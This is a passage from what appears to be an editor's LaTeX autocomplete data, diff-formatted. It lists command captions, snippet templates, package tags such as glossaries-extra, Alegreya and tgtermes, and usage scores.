'\\empty', + snippet: '\\empty', + meta: 'tgtermes-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgtermes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgtermes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgtermes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgtermes-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgtermes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgtermes-cmd', + score: 0.021170869458413965, + }, + ], + Alegreya: [ + { + caption: '\\rmfamily', + snippet: '\\rmfamily', + meta: 'Alegreya-cmd', + score: 0.00898937903263608, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'Alegreya-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'Alegreya-cmd', + score: 0.008565354665444157, + }, + ], + 'glossaries-extra': [ + { + caption: '\\gls{}', + snippet: '\\gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.06939353309055077, + }, + { + caption: '\\Gls{}', + snippet: '\\Gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.003696678698317109, + }, + { + caption: '\\makeglossaries', + snippet: '\\makeglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0056737600836936995, + }, + { + caption: '\\newabbreviation{}{}{}', + snippet: '\\newabbreviation{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.00023275591440052114, + }, + { + caption: '\\newglossaryentry{}{}', + snippet: '\\newglossaryentry{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.018524394136900962, + }, + { + caption: '\\newglossary{}{}', + snippet: '\\newglossary{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 1.4547244650032571e-5, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\glslongpluralkey', + snippet: '\\glslongpluralkey', + meta: 'glossaries-extra-cmd', + score: 1.4538687447297259e-5, + }, + { + caption: '\\Glspl{}', + snippet: '\\Glspl{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0025291265119320736, + }, + { + caption: '\\glossarysection', + snippet: '\\glossarysection', + meta: 'glossaries-extra-cmd', + score: 9.579755294730752e-5, + }, + { + caption: '\\printglossaries', + snippet: '\\printglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0010106582768889887, + }, + { + caption: '\\Gls{}', + snippet: '\\Gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.003696678698317109, + }, + { + caption: '\\setglossarystyle{}', + snippet: '\\setglossarystyle{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0003758893277679221, + }, + { + caption: '\\printglossary', + snippet: '\\printglossary', + meta: 'glossaries-extra-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\printglossary[]', + snippet: '\\printglossary[$1]', + meta: 'glossaries-extra-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\setglossarysection{}', + snippet: '\\setglossarysection{$1}', + meta: 'glossaries-extra-cmd', + score: 3.6081414102781514e-5, + }, + { + caption: '\\glsresetall', + snippet: '\\glsresetall', + meta: 'glossaries-extra-cmd', + score: 0.0006123462672467326, + }, + { + caption: '\\the', + snippet: '\\the', + meta: 'glossaries-extra-cmd', + score: 0.007238960303946444, + }, + { + caption: '\\acrshort{}', + snippet: '\\acrshort{$1}', + meta: 'glossaries-extra-cmd', + score: 0.009936841864059727, + }, + { + caption: '\\printnoidxglossary[]', + snippet: '\\printnoidxglossary[$1]', + meta: 'glossaries-extra-cmd', + score: 0.00021912375285685037, + }, + { + caption: '\\newglossary{}{}', + snippet: '\\newglossary{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 1.4547244650032571e-5, + }, + { + caption: '\\gls{}', + snippet: '\\gls{$1}', + meta: 'glossaries-extra-cmd', + score: 0.06939353309055077, + }, + { + caption: '\\printnoidxglossaries', + snippet: '\\printnoidxglossaries', + meta: 'glossaries-extra-cmd', + score: 5.6789564226023136e-5, + }, + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'glossaries-extra-cmd', + score: 0.004417016910870522, + }, + { + caption: '\\defglsentryfmt[]{}', + snippet: '\\defglsentryfmt[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glspostdescription', + snippet: '\\glspostdescription', + meta: 'glossaries-extra-cmd', + score: 0.0006337376579591112, + }, + { + caption: '\\number', + snippet: '\\number', + meta: 'glossaries-extra-cmd', + score: 0.000968714260809983, + }, + { + caption: '\\glsaddall', + snippet: '\\glsaddall', + meta: 'glossaries-extra-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\glsaddall[]', + snippet: '\\glsaddall[$1]', + meta: 'glossaries-extra-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\makeglossaries', + snippet: '\\makeglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0056737600836936995, + }, + { + caption: '\\glossaryname', + snippet: '\\glossaryname', + meta: 'glossaries-extra-cmd', + score: 0.0006174536302752427, + }, + { + caption: '\\newglossaryentry{}{}', + snippet: '\\newglossaryentry{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.018524394136900962, + }, + { + caption: '\\glslabel', + snippet: '\\glslabel', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glsadd{}', + snippet: '\\glsadd{$1}', + meta: 'glossaries-extra-cmd', + score: 3.0150373480213892e-5, + }, + { + caption: '\\makenoidxglossaries', + snippet: '\\makenoidxglossaries', + meta: 'glossaries-extra-cmd', + score: 0.0001382210125680805, + }, + { + caption: '\\glsgenentryfmt', + snippet: '\\glsgenentryfmt', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acronymtype', + snippet: '\\acronymtype', + meta: 'glossaries-extra-cmd', + score: 0.002000834271117562, + }, + { + caption: '\\acrfull{}', + snippet: '\\acrfull{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0032622587277765067, + }, + { + caption: '\\newacronym{}{}{}', + snippet: '\\newacronym{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.03193935544723102, + }, + { + caption: '\\glspl{}', + snippet: '\\glspl{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0034025897522047717, + }, + { + caption: '\\ifglsused{}{}{}', + snippet: '\\ifglsused{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acrlong{}', + snippet: '\\acrlong{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002517821598213752, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'glossaries-extra-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-extra-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'glossaries-extra-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'glossaries-extra-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'glossaries-extra-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'glossaries-extra-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'glossaries-extra-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'glossaries-extra-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'glossaries-extra-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'glossaries-extra-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'glossaries-extra-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'glossaries-extra-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'glossaries-extra-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'glossaries-extra-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'glossaries-extra-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'glossaries-extra-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'glossaries-extra-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'glossaries-extra-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'glossaries-extra-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'glossaries-extra-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'glossaries-extra-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'glossaries-extra-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'glossaries-extra-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'glossaries-extra-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'glossaries-extra-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'glossaries-extra-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'glossaries-extra-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'glossaries-extra-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'glossaries-extra-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'glossaries-extra-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'glossaries-extra-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'glossaries-extra-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'glossaries-extra-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'glossaries-extra-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'glossaries-extra-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'glossaries-extra-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'glossaries-extra-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'glossaries-extra-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'glossaries-extra-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'glossaries-extra-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'glossaries-extra-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'glossaries-extra-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'glossaries-extra-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'glossaries-extra-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'glossaries-extra-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'glossaries-extra-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'glossaries-extra-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'glossaries-extra-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'glossaries-extra-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'glossaries-extra-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'glossaries-extra-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'glossaries-extra-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'glossaries-extra-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'glossaries-extra-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'glossaries-extra-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'glossaries-extra-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'glossaries-extra-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'glossaries-extra-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'glossaries-extra-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'glossaries-extra-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'glossaries-extra-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'glossaries-extra-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'glossaries-extra-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'glossaries-extra-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'glossaries-extra-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'glossaries-extra-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'glossaries-extra-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'glossaries-extra-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'glossaries-extra-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'glossaries-extra-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'glossaries-extra-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'glossaries-extra-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'glossaries-extra-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'glossaries-extra-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'glossaries-extra-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'glossaries-extra-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'glossaries-extra-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'glossaries-extra-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'glossaries-extra-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'glossaries-extra-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'glossaries-extra-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'glossaries-extra-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'glossaries-extra-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'glossaries-extra-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'glossaries-extra-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'glossaries-extra-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'glossaries-extra-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'glossaries-extra-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'glossaries-extra-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'glossaries-extra-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'glossaries-extra-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'glossaries-extra-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'glossaries-extra-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'glossaries-extra-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'glossaries-extra-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'glossaries-extra-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'glossaries-extra-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'glossaries-extra-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'glossaries-extra-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'glossaries-extra-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'glossaries-extra-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'glossaries-extra-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'glossaries-extra-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'glossaries-extra-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'glossaries-extra-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'glossaries-extra-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'glossaries-extra-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'glossaries-extra-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'glossaries-extra-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-extra-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'glossaries-extra-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'glossaries-extra-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'glossaries-extra-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'glossaries-extra-cmd', + score: 2.341195220791228, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-extra-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'glossaries-extra-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'glossaries-extra-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'glossaries-extra-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'glossaries-extra-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'glossaries-extra-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'glossaries-extra-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'glossaries-extra-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 